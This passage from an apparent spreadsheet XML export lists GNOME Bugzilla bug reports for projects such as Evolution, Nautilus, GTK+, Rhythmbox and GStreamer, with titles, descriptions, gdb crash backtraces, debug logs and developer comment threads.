ead.c:934
#2  0x401fac5c in pthread_cond_wait (cond=0x8136300 mutex=0x81362e0)
    at restart.h:34
#3  0x400843ee in e_msgport_wait (mp=0x81362b8) at e-msgport.c:193
#4  0x40084a16 in thread_dispatch (din=0x8136268) at e-msgport.c:512
#5  0x401fbbfd in pthread_start_thread (arg=0x41469c00) at manager.c:262
Thread 2 (Thread 2049 (LWP 9054)):
#0  0x40b6f227 in __poll (fds=0x813d504 nfds=1 timeout=2000)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#1  0x401fb900 in __pthread_manager (arg=0x16) at manager.c:136
Thread 1 (Thread 1024 (LWP 9045)):
#0  0x40b4a519 in __wait4 () from /lib/i686/libc.so.6
#1  0x40bba9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x40200563 in waitpid (pid=9068 stat_loc=0xbffff3fc options=0)
    at wrapsyscall.c:172
#3  0x406cb2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x08095cf1 in segv_redirect (sig=11) at main.c:67
#5  0x401fe935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 151242208 esi = 10 ebp = 3221223368 esp = 3221223356 ebx = 151242288 edx = 26 ecx = 10 eax = 4294967292 trapno = 0 err = 0 eip = 1085731367 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223356 ss = 43 __ssh = 0 fpstate = 0xbffff540 oldmask = 2147483648 cr2 = 0}) at signals.c:97
#6  
#7  0x40b6f227 in __poll (fds=0x903c5e0 nfds=10 timeout=249)
    at ../sysdeps/unix/sysv/linux/poll.c:63
#8  0x40a7ea74 in g_main_poll (timeout=249 use_priority=0 priority=0)
    at gmain.c:1034
#9  0x40a7e465 in g_main_iterate (block=1 dispatch=1) at gmain.c:808
#10 0x40a7e7e8 in g_main_run (loop=0x80f7280) at gmain.c:935
#11 0x4098f65b in gtk_main () at gtkmain.c:524
#12 0x4057355f in bonobo_main () at bonobo-main.c:283
#13 0x08095e9f in main (argc=3 argv=0xbffffa64) at main.c:141
#14 0x40aac177 in __libc_start_main (main=0x8095d1c  argc=3 
    ubp_av=0xbffffa64 init=0x8064e58  fini=0x80c9160  
    rtld_fini=0x4000e184  stack_end=0xbffffa5c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x40b4a519 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b4a519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x40bba9e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x40200563 in waitpid (pid=9068 stat_loc=0xbffff3fc options=0)
    at wrapsyscall.c:172
	in wrapsyscall.c
stat_loc = (int *) 0xbffff3fc
options = 0
result = 0
oldtype = 0
#3  0x406cb2a6 in gnome_segv_handle (signum=11) at gnome-init.c:659
	in gnome-init.c
estatus = 0
in_segv = 1
pid = 0
#4  0x08095cf1 in segv_redirect (sig=11) at main.c:67
67			gnome_segv_handler (sig)
sig = 11
#5  0x401fe935 in pthread_sighandler (signo=11 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 edi = 151242208 esi = 10 ebp = 3221223368 esp = 3221223356 ebx = 151242288 edx = 26 ecx = 10 eax = 4294967292 trapno = 0 err = 0 eip = 1085731367 cs = 35 __csh = 0 eflags = 2097686 esp_at_signal = 3221223356 ss = 43 __ssh = 0 fpstate = 0xbffff540 oldmask = 2147483648 cr2 = 0}) at signals.c:97
	in signals.c
signo = 0
__value = 0x8095cd0 U\211Ã¥SP\213]\bÃ¨#\037Ã½Ã¿\213\025Ã´8\016\b9Ãu\025\203Ã¬\fSÃ¿\025Ã2\016\b\203Ã„\020\213]Ã¼Ã‰Ãƒ\215v
#6  
No locals.
#7  0x40b6f227 in __poll (fds=0x903c5e0 nfds=10 timeout=249)
    at ../sysdeps/unix/sysv/linux/poll.c:63
	in ../sysdeps/unix/sysv/linux/poll.c
fds = (struct pollfd *) 0x903c5e0
nfds = 3221222396
timeout = 0
resultvar = 151242208
</t>
  </si>
  <si>
    <t>EVOLUTION-200900</t>
  </si>
  <si>
    <t>Edit VFolders dialog should pick next item after Delete</t>
  </si>
  <si>
    <t>When you select a vfolder in the Edit VFolders dialog and click on Delete the
next vfolder in the list should be selected automatically.  This would make the
dialog a bit easier to use.
(It should also support DnD to rearrange the order of VFolders this should
perhaps be a separate bug report)</t>
  </si>
  <si>
    <t>GLIB-503862</t>
  </si>
  <si>
    <t>Allow NULL strings in g_parse_debug_string()</t>
  </si>
  <si>
    <t>It seems silly for g_parse_debug_string() to reject NULL strings with a warning when passing it the result of an environment variable lookup (which may be NULL) is such a common use case.
g_parse_debug_string() should _silently_ return 0 if the input string is NULL so that g_getenv() can be embedded directly in the call like so:
    flags = g_parse_debug_string (
            g_getenv (MYLIB_DEBUG)
            debug_keys G_N_ELEMENTS (debug_keys))</t>
  </si>
  <si>
    <t>GNOME-CALCULATOR-380145</t>
  </si>
  <si>
    <t>Markup error in alert message</t>
  </si>
  <si>
    <t>Changing Modes Clears Calculation
Closing tags are in the wrong order causing the alert to be incorrectly displayed.</t>
  </si>
  <si>
    <t>GSTREAMER-103170</t>
  </si>
  <si>
    <t>Gst-player and Rhythmbox do not manage to play</t>
  </si>
  <si>
    <t>DEBUG( 1252: 0)gstcaps.c(204): gst_caps_debug: : leaving :caps debug
DEBUG( 1252: 0)gstelement.c(1470): gst_element_link_filtered: : linked pad
autoplugger:src_1 to pad video_queue:sink
DEBUG( 1252: 0)gstobject.c(304): gst_object_dispatch_properties_changed: : deep
notification from source to work_thread (location)
DEBUG( 1252: 0)gstobject.c(304): gst_object_dispatch_properties_changed: : deep
notification from source to main_pipeline (location)
DEBUG( 1252: 0)gstelement.c(2103): gst_element_set_state: : [main_pipeline]
setting state from READY to PLAYING
DEBUG( 1252: 0)gstelement.c(2122): gst_element_set_state: : [main_pipeline]
intermediate: setting state from READY to PAUSED
DEBUG( 1252: 0)gstelement.c(2103): gst_element_set_state: : [work_thread]
setting state from READY to PAUSED
DEBUG( 1252: 0)gstelement.c(2148): gst_element_set_state: : [work_thread]
element claimed state-change successbut state didn't change READY PAUSED
 PAUSED
DEBUG( 1252: 0)gstbin.c(618): gst_bin_change_state: : child 'work_thread'
failed to go to state 4(PAUSED)
DEBUG( 1252: 0)gstelement.c(2103): gst_element_set_state: : [work_thread]
setting state from READY to READY
DEBUG( 1252: 0)gstelement.c(2148): gst_element_set_state: : [main_pipeline]
element claimed state-change successbut state didn't change READY
NONE_PENDING  PAUSED</t>
  </si>
  <si>
    <t>VTE-130267</t>
  </si>
  <si>
    <t>bindings of vte for python are incomplete</t>
  </si>
  <si>
    <t>Package: python-vte
Version: 1:0.11.10-3
I try to use the python bindings of vte to write some application.
It appeared that there is nearly no function offered originally by vte.
help function from python2.3 say that there are only 2 functions exported:
==
Help on module vte:
NAME
    vte
FILE
    /usr/lib/python2.3/site-packages/vtemodule.so
FUNCTIONS
    vte_terminal_erase_binding_get_type(...)
    vte_terminal_get_type(...)
==                  
Versions of packages python-vte depends on:
ii  libatk1.0-0               1.4.1-1        The ATK accessibility toolkit
ii  libc6                     2.3.2.ds1-10   GNU C Library: Shared libraries an
ii  libfontconfig1            2.2.1-13       generic font configuration library
ii  libfreetype6              2.1.7-1        FreeType 2 font engine shared lib
ii  libglib2.0-0              2.2.3-1        The GLib library of C routines
ii  libgtk2.0-0               2.2.4-2        The GTK+ graphical user interface 
ii  libncurses5               5.3.20030719-4 Shared libraries for terminal hand
ii  libpango1.0-0             1.2.5-2.1      Layout and rendering of internatio
ii  libvte4                   1:0.11.10-3    Terminal emulator widget for GTK+ 
ii  libxft2                   2.1.2-5        FreeType-based font drawing librar
ii  libxrender1               0.8.3-5        X Rendering Extension client libra
ii  python                    2.3.3-1        An interactive high-level object-o
ii  python-gtk2               2.0.0-3        Python bindings for the GTK+ widge
ii  xlibs                     4.2.1-14       X Window System client libraries
ii  zlib1g                    1:1.2.1-3      compression library - runtime</t>
  </si>
  <si>
    <t>godfryd</t>
  </si>
  <si>
    <t>GNOME-APPLETS-77840</t>
  </si>
  <si>
    <t>history list not always appear near the applet</t>
  </si>
  <si>
    <t>When the history button is invoked through keyboard the list popups
wherever the mouse pointer is currently placed. If the mouse pointer is in 
the middle of the screen then the list pops up there. I think the list 
should appear near the applet.</t>
  </si>
  <si>
    <t>NAUTILUS-77892</t>
  </si>
  <si>
    <t>drag icon to trash=crash [or open trash for some people]</t>
  </si>
  <si>
    <t xml:space="preserve">Package: nautilus
Severity: normal
Version: 1.1.11
Synopsis: drag icon to trash=crash
Bugzilla-Product: nautilus
Bugzilla-Component: Trash
BugBuddy-GnomeVersion: 2.0 (1.114.0)
Description:
Drag an item on the desktop background to the trash causes crash.	
Debugging Information:
Backtrace was generated from
'/home/jfleck/gnome/head/INSTALL/bin/nautilus'
[New Thread 1024 (LWP 875)]
[New Thread 2049 (LWP 876)]
[New Thread 1026 (LWP 877)]
[New Thread 2051 (LWP 878)]
0x40b6dca9 in __wait4 () from /lib/i686/libc.so.6
#0  0x40b6dca9 in __wait4 () from /lib/i686/libc.so.6
#1  0x40be96b4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4044f6f3 in waitpid (pid=959 stat_loc=0xbfffecbc options=0)
    at wrapsyscall.c:172
#3  0x401c616d in libgnomeui_segv_handle (signum=5) at
gnome-ui-init.c:593
#4  0x4044da85 in pthread_sighandler (signo=5 ctx=
      {gs = 7 __gsh = 0 fs = 0 __fsh = 0 es = 43 __esh = 0 ds =
43 __dsh = 0 edi = 0 esi = 1083842456 ebp = 3221222568 esp =
3221221472 ebx = 1083843096 edx = 1 ecx = 0 eax = 0 trapno = 3 err
= 0 eip = 1083602068 cs = 35 __csh = 0 eflags = 582 esp_at_signal =
3221221472 ss = 43 __ssh = 0 fpstate = 0xbfffede0 oldmask =
2147483648 cr2 = 0}) at signals.c:97
#5  
#6  0x40967494 in g_logv (log_domain=0x4011ba5c Eel 
    log_level=G_LOG_LEVEL_ERROR 
    format=0x4011bb40 file %s: line %d (%s): assertion failed: (%s) 
    args1=0xbffff4dc) at gmessages.c:503
#7  0x40967547 in g_log (log_domain=0x4011ba5c Eel 
    log_level=G_LOG_LEVEL_ERROR 
    format=0x4011bb40 file %s: line %d (%s): assertion failed: (%s))
    at gmessages.c:526
#8  0x40113952 in eel_format_uri_for_display_internal (
    uri=0x8293130 file:!
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-04-06 21:51 -------
Unknown version 1.1.x in product nautilus. Setting version to the default unspecified.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GNUMERIC-161915</t>
  </si>
  <si>
    <t>Increasing and decreasing precision don't work as expected</t>
  </si>
  <si>
    <t>1. Create a new spreadsheet.
2. Type 5.555 in cell A1.
3. Select cell A1.
4. Click the increase precision button a couple of times.
Actual Results:
5.555 -&gt; 5.6 -&gt; 5.56 -&gt; 5.555 -&gt; 5.5550 -&gt; 5.55500 -&gt; 5.555000
Expected Results:
5.555 -&gt; 5.5550 -&gt; 5.55500 -&gt; 5.555000 -&gt; 5.555000
5. Type 5.555 in cell A2.
6. Select cell A2.
7. Click the decrease precision button a couple of times.
Actual Results:
5.555 -&gt; 5.5550000 -&gt; 5.555000 -&gt; 5.55500 -&gt; 5.5550 -&gt; 5. -&gt; 5. -&gt; 5. -&gt; 6
Expected Results:
5.555 -&gt; 5.56 -&gt; 5.6 -&gt; 6</t>
  </si>
  <si>
    <t>RHYTHMBOX-528513</t>
  </si>
  <si>
    <t>have to run rhythmbox twice to see the main window</t>
  </si>
  <si>
    <t>Please describe the problem:
I am using Rhythmbox in the XFCE desktop.  I run rhythmbox via a keyboard shortcut which just runs rhythmbox.
I have to press the keyboard shortcut twice before I can see the main window.  If I press it once I only get the notification area icon.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-45706</t>
  </si>
  <si>
    <t>install lib isn't working on RPM4</t>
  </si>
  <si>
    <t xml:space="preserve">the install lib isn't working against RPM4 on eli's or eskil's machine.
we think it might be a link issue.
------- Additional Comments From robey-bugs@lag.net 2001-01-16 18:38:11 ----
definitely a link issue: works on a build i made myself (on RH7) but not on the
rpm's coming off of build2.
ldd of the broken 'trilobite-eazel-install-service' shows an extra libdb.so.3 at
the end: BAD MEDICINE.  we've seen this before.
gotta figure out how that extra libdb.so.3 got there and how to make it go
away.
[eli has been helping (at gunpoint) so i changed the QA contact to him]
------- Additional Comments From robey-bugs@lag.net 2001-01-16 22:09:39 ----
it's a build issue svadilfari (build2) is using glibc 2.2 probably because
rick's magick disk installs that [? just a guess].
glibc 2.2 seems to add its own -ldb link to the trilobite-eazel-install-service
which fouls up the rpm library.  (rpm is very very picky about which version of
libdb it links with we've run into this before.  i'm going to file another bug
about a possible long-term solution to that shortly.)
on my test machine i tried a normal RH7 install with a correctly built nautilus
(built against glibc 2.1.9x) and installs worked.  then i installed glibc 2.2 on
the test machine and tried another install: still worked.  this gives me
confidence that if we build against 2.1.9x we'll work on both types of systems.
so: i'm punting this bug to robin:  please install glibc 2.1.9x (whatever comes
with RH7.0) on svadilfari and then punt this bug back to me.  hopefully that
will cause trilobite-eazel-install-service to get built correctly.
------- Additional Comments From robey-bugs@lag.net 2001-01-16 22:10:17 ----
marking P1 because this is causing no small amount of panic.
------- Additional Comments From robey-bugs@lag.net 2001-01-16 22:16:51 ----
made bug 45717 to track the long-term solution.
------- Additional Comments From rslomkow@eazel.com 2001-01-16 23:19:13 ----
The issue is that RedHat updates
ftp://ftp.freesoftware.com:/pub/linux/redhat/updates/7.0/i386
do indeed use glibc-2.2
there were problems with the default on a non-updated RedHat 7.0 machine.
I think the real solution is to update the user to the official RedHat updates.
------- Additional Comments From robey-bugs@lag.net 2001-01-17 01:33:15 ----
robin our users will be okay but -- at least for now -- we can't have the 
build2 machine using glibc 2.2 because it messes up the link order for the 
install lib.
quick testing on my machine showed that users should be okay with either glibc 
as long as the rpm's were built on a glibc 2.1.9x machine.
------- Additional Comments From albert@eazel.com 2001-01-17 09:52:21 ----
Eskil has two bugs marked as assigned - Bug 44891 and Bug 44892.  These two bugs
may be related to Bug 45706.
------- Additional Comments From robey-bugs@lag.net 2001-01-17 17:18:20 ----
bad news -- the build from 14.something today was still built with the evil
libdb stuff in it.  are we sure that svadilfari had been updated before 2pm?  if
so we're back to regressing it to glibc 2.1.9x.
------- Additional Comments From don@eazel.com 2001-01-18 22:22:36 ----
Is this really required for PR3?
------- Additional Comments From pepper@eazel.com 2001-01-24 13:29:05 ----
Eskil is actually about to check in a fix for this shortly.  Waiting for him to
finish his uberpatch for pr3.
------- Additional Comments From don@eazel.com 2001-01-24 18:21:01 ----
Is this the patch that Ramiro is reviewing for him?
------- Additional Comments From pepper@eazel.com 2001-01-24 19:32:35 ----
I believe it is.
------- Additional Comments From pepper@eazel.com 2001-01-25 13:23:25 ----
Eskil checked in a fix for this last night.
------- Additional Comments From eli@eazel.com 2001-01-27 14:54:42 ----
Robey Robin or anybody --- I have absolutely no idea how to verify this.
I can upgrade to RPM 4 on an RH 6.2 system but I'm not sure how to confirm that
this fixed without encountering other bugs.
------- Additional Comments From eskil@eskil.dk 2001-01-27 18:54:41 ----
Eli - for Friggs sake don't try to upgrade to rpm4 on a rh62 machine.
This patch has been tested by Ramiro and whonot. You can only verify by using a
set of nautilus pr3 builds on a rh70 machine.
------- Additional Comments From robey-bugs@lag.net 2001-01-27 19:03:27 ----
agreed should be easy to verify or not on RH7 machine: if installs work at all
under RH7 this must be fixed. :)
------- Additional Comments From eli@eazel.com 2001-01-27 19:05:02 ----
Err but...I've never seen an install work on Red Hat 7.  )
------- Additional Comments From robey-bugs@lag.net 2001-01-27 19:40:24 ----
then obviously you can't verify this till it does )
------- Additional Comments From eli@eazel.com 2001-01-27 19:41:42 ----
Removing PR3 designation. This cannot be verified in PR3 due to other bugs
blocking install lib from being testable on RPM 4.
------- Additional Comments From robey-bugs@lag.net 2001-01-27 19:49:38 ----
eskil's been able to get it to work -- cc'ing him.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:53 -------
The original owner (pepper@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component nautilus-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>EVOLUTION-323402</t>
  </si>
  <si>
    <t>Sources in the side bar should be ellipsized</t>
  </si>
  <si>
    <t>Sources in the side bar (mailboxes but also calendar etc) should have their
labels ellipsized.</t>
  </si>
  <si>
    <t>FIVE-OR-MORE-695469</t>
  </si>
  <si>
    <t>FIVE-OR-MORE</t>
  </si>
  <si>
    <t>Fix FSF address in COPYING</t>
  </si>
  <si>
    <t>Created attachment 238423
patch
Update to current version at http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt</t>
  </si>
  <si>
    <t>five-or-more-maint</t>
  </si>
  <si>
    <t>doshitan</t>
  </si>
  <si>
    <t>GNOME-MAG-416911</t>
  </si>
  <si>
    <t>magnifier stop updating the screen after adding/removing a ZoomRegion</t>
  </si>
  <si>
    <t>Please describe the problem:
When using COMPOSITE &gt;= 0.3 the magnifier is reparent to the OverlayWindow to avoid interferences by others windows like the pop-up ones.
After adding/removing a ZoomRegion the magnifier stop to update the screen but the application still receives RPC.
The magnifier continue to update the window OK if the magnifier window is reparented to the ROOT window had the ZoomRegion added/removed and then reparented again to the OverlayWindow.
I don't think that we must do the process described in the last paragraph to make the magnifier window be updated but If the X guys don't think that this can be a bug so we must have some workaround.
Steps to reproduce:
1. Start the magnifier with -f -v or -h option.
2. In the test folder call: ./control-client d (This clear all ZoomRegions) - Percept that the magnifier will stop to update the magnifier window.
3. Call: ./control-client c (This add a ZoomRegion)
4. Call: ./control-cleint x (This make the magnifier exit) - Percept that you continue to send RPC. The problem is only with the magnifier window update.
Actual results:
The magnifier stop to update the magnifier window but still can receive RPC.
Expected results:
The magnifier would continue to update the magnifier window.
Does this happen every time?
Yes.
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-42578</t>
  </si>
  <si>
    <t>Need to check for error case when loading bonobo embeddable</t>
  </si>
  <si>
    <t xml:space="preserve">There's a FIXME about this in nautilus-view-frame-bonobo-embeddable.c.
------- Additional Comments From eli@eazel.com 2000-10-16 19:43:05 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
</t>
  </si>
  <si>
    <t>GAUPOL-518981</t>
  </si>
  <si>
    <t>GAUPOL</t>
  </si>
  <si>
    <t>Misleading preview error dialog if video player not found</t>
  </si>
  <si>
    <t>Please describe the problem:
I cannot preview the subtitles on my system since it says it cannot find the  temporary directory:
Failed to save subtitle file to temporary directory c:\documen~1\anton\locals~1\temp The system cannot find the path specified.
I am on a windows system and if I put that path in the explorer the directory exists.
Steps to reproduce:
I have an XP SP2. All I do is to open a srt file and choose preview from the menu.
Actual results:
I receive a dialog  box with the text above.
Expected results:
Preview the sbtitles in a player I imagine.
Does this happen every time?
yes
Other information:
I hope you can reproduce this.</t>
  </si>
  <si>
    <t>gaupol-maint</t>
  </si>
  <si>
    <t>afw</t>
  </si>
  <si>
    <t>GTK+-315253</t>
  </si>
  <si>
    <t>gtk_action_connect_proxy will not set a label on a button with no label</t>
  </si>
  <si>
    <t>connect_proxy() requires a button to have a stock_id set or to have a label thus
a blank button will not have its label set when used as an action proxy. This
used to work before the patch for 165534 was applied.</t>
  </si>
  <si>
    <t>BEAGLE-170636</t>
  </si>
  <si>
    <t>No Title or Snippet is shown in web-pages search results when using beagle firefox plugin</t>
  </si>
  <si>
    <t>Distribution/Version: SuSE 9.3
1. I have installed beagle.xpi the firefox beagle plugin.
2. Beagle starts indexing the web-pages I am browsing.
3. I search for a string (that I know is present in the web-pages I have visited)
4. Best displays the search results but there is no Title and Snippet.</t>
  </si>
  <si>
    <t>GTK+-311630</t>
  </si>
  <si>
    <t>unistd.h error in gtkfilechooserdefault.c</t>
  </si>
  <si>
    <t>Please describe the problem:
unistd.h is included unconditionally.
Function 'access' needs to include io.h on Visual C++.
And F_OK is not defined on Visual C++.
Steps to reproduce:
1. compile by Visual C++ 6.0
Actual results:
following messages are displayed.
gtkfilechooserdefault.c(88) : fatal error C1083: Cannot open include file:
'unistd.h': No such file or directory
gtkfilechooserdefault.c(116) : error C4013: 'access' undefined assuming extern
returning int
gtkfilechooserdefault.c(116) : error C2065: 'F_OK' : undeclared identifier
Expected results:
I think that we should use g_file_test.
http://developer.gnome.org/doc/API/2.0/glib/glib-File-Utilities.html#g-file-test
If we don't use it we have to do following.
1. Surround #include  by #ifdef HAVE_UNISTD_H and #endif.
2. Include io.h on Visual C++.
3. Define F_OK when it's undefined.
Does this happen every time?
every time
Other information:</t>
  </si>
  <si>
    <t>RHYTHMBOX-456110</t>
  </si>
  <si>
    <t>crash in Rhythmbox Music Player: I attempted to make an a...</t>
  </si>
  <si>
    <t>Version: 0.10.1
What were you doing when the application crashed?
I attempted to make an automatic playlist where the rule was 'not played in the last 5200 weeks' (an attempt to basically just have the Never tracks).
Distribution: Gentoo Base System release 1.12.9
Gnome Release: 2.16.3 2007-05-30 (Gentoo)
BugBuddy Version: 2.16.1
System: Linux 2.6.19-gentoo-r5 #1 SMP Sat Jun 9 01:59:45 CDT 2007 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
Memory status: size: 214175744 vsize: 0 resident: 214175744 share: 0 rss: 90570752 rss_rlim: 0
CPU usage: start_time: 1184205499 rtime: 0 utime: 13817 stime: 0 cutime:12210 cstime: 0 timeout: 1607 it_real_value: 0 frequency: 1
Backtrace was generated from '/usr/bin/rhythmbox'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1229519184 (LWP 28745)]
[New Thread -1374393456 (LWP 30244)]
[New Thread -1322259568 (LWP 30242)]
[New Thread -1382900848 (LWP 30241)]
[New Thread -1357608048 (LWP 28819)]
[New Thread -1349215344 (LWP 28818)]
[New Thread -1340822640 (LWP 28817)]
[New Thread -1297089648 (LWP 28814)]
[New Thread -1313866864 (LWP 28813)]
[New Thread -1256875120 (LWP 28752)]
0xb7f11410 in ?? ()
#0  0xb7f11410 in ?? ()
#1  0xbf9e1738 in ?? ()
#2  0x00000000 in ?? ()
Thread 10 (Thread -1256875120 (LWP 28752)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xb51592c8 in ?? ()
No symbol table info available.
#2  0x00001f0f in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 9 (Thread -1313866864 (LWP 28813)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xb1afe3d8 in ?? ()
No symbol table info available.
#2  0x00000003 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 8 (Thread -1297089648 (LWP 28814)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xb2afee98 in ?? ()
No symbol table info available.
#2  0x00000045 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 7 (Thread -1340822640 (LWP 28817)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xb0149638 in ?? ()
No symbol table info available.
#2  0x00000003 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 6 (Thread -1349215344 (LWP 28818)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xaf948c38 in ?? ()
No symbol table info available.
#2  0x0000004d in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 5 (Thread -1357608048 (LWP 28819)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xaf147e58 in ?? ()
No symbol table info available.
#2  0x00000021 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 4 (Thread -1382900848 (LWP 30241)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xad9292a8 in ?? ()
No symbol table info available.
#2  0xb71cf1e0 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#3  0xad92928c in ?? ()
No symbol table info available.
#4  0xb7cf7b46 in ?? () from /lib/libpthread.so.0
No symbol table info available.
#5  0xb7187682 in g_usleep () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0xb482528c in ?? () from /usr/lib/gstreamer-0.10/libgstxvimagesink.so
No symbol table info available.
#7  0x0000c350 in ?? ()
No symbol table info available.
#8  0x01c00022 in ?? ()
No symbol table info available.
#9  0x00028000 in ?? ()
No symbol table info available.
#10 0xad929328 in ?? ()
No symbol table info available.
#11 0x000006e4 in ?? ()
No symbol table info available.
#12 0x00007596 in ?? ()
No symbol table info available.
#13 0x00000000 in ?? ()
No symbol table info available.
Thread 3 (Thread -1322259568 (LWP 30242)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xb12fe398 in ?? ()
No symbol table info available.
#2  0x00000007 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 2 (Thread -1374393456 (LWP 30244)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xae146398 in ?? ()
No symbol table info available.
#2  0x00000005 in ?? ()
No symbol table info available.
#3  0x00000000 in ?? ()
No symbol table info available.
Thread 1 (Thread -1229519184 (LWP 28745)):
#0  0xb7f11410 in ?? ()
No symbol table info available.
#1  0xbf9e1738 in ?? ()
No symbol table info available.
#2  0x00000000 in ?? ()
No symbol table info available.
#0  0xb7f11410 in ?? ()
The program is running.  Quit anyway (and detach it)? (y or n) [answered Y input not from terminal]</t>
  </si>
  <si>
    <t>LSR-385991</t>
  </si>
  <si>
    <t>Bring BrlAPIDevice up to date with brlapi.  acceptKeySets and some constants</t>
  </si>
  <si>
    <t>Bring BrlAPIDevice up to date with brlapi.  acceptKeySets() is not working as advertised and some constants needed to be changed.</t>
  </si>
  <si>
    <t>GNOME-CORE-13451</t>
  </si>
  <si>
    <t>bug up the butt</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.0
Synopsis: bug up the butt
Class:    sw-bug
System: SunOS 5.7 sun4u sparc
C compiler: /usr/ucb/cc:  language optional software package not installed
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.0
libxml: 1.8.7
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.0
Description:
when ever i make a launcher on the panel and try to launch it the panel
crashes
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:11 -------
This bug was previously known as bug 13451 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=13451
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (root@spaceman.newsdigital.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>GTK+-763659</t>
  </si>
  <si>
    <t>DND Drop on root with Pixbuf leaves image behind</t>
  </si>
  <si>
    <t>In my application I support dragging a widget off the application and dropping it on the root window to detach them. It uses similar code as GtkNotebook except I use a Pixbuf as the drag image instead of a window. This all works fine in 3.18 and earlier however in 3.19 (on Rawhide) I'm finding that it leaves the drag image behind.
A video of the problematic behavior can be viewed here:
https://www.youtube.com/watch?v=gPArxtvCmY4
If I change my code to use identical behavior as GtkNotebook i.e. drag a window destroy it in drag end it all works fine.</t>
  </si>
  <si>
    <t>gerald.b.nunn</t>
  </si>
  <si>
    <t>GNOME-CONTROL-CENTER-642033</t>
  </si>
  <si>
    <t>Use a single row for device info</t>
  </si>
  <si>
    <t>As discussed on IRC Sound panel can use a single row to show info about managed Devices on tables available in Hardware Input and Output tabs.
Current status and mockup attached</t>
  </si>
  <si>
    <t>GNOME-PANEL-323837</t>
  </si>
  <si>
    <t>gnome-panel fails adding file monitor for .gtk-bookmarks</t>
  </si>
  <si>
    <t>Version details: 2.12.1
Distribution/Version: Custom (Likos) - Based on Linux From Scratch
Built Linux base using LinuxFromScratch.org's LFS and BLFS guides (development
versions)
Followed BLFS's guide on setting up GNOME.  When gnome-panel starts after the
startx command for it crashes and displays:
** (gnome-panel:3240): WARNING **: Failed to add file monitor for
file:///home/cjpro/.gtk-bookmarks: Unsupported operation
Note KDE 3.5 was running sucessfully but was removed prior to installation of
GNOME.</t>
  </si>
  <si>
    <t>GTHUMB-464446</t>
  </si>
  <si>
    <t>Zoom to Fit feature vanished from UI</t>
  </si>
  <si>
    <t>Please describe the problem:
In recent gthumb versions I have not found a way to make images zoom to fit in all cases. I use this to make sure images will be truly fullscreen in slideshows regardless of whether they are smaller taller or wider than the screen.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>GDM-101729</t>
  </si>
  <si>
    <t>Unify copyright strings</t>
  </si>
  <si>
    <t>Patch incoming.
The string copyright still is translatable because in some languages
(e.g. German) it's capitalized.
regs
 Chris</t>
  </si>
  <si>
    <t>EVOLUTION-233668</t>
  </si>
  <si>
    <t>Me Too! - Unable to create subfolders on DBMail IMAP server</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 1.2.0
Synopsis: Unable to create Subfolders on imap server
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
whenever I try to create a new subfolder on an IMAP server it gives me
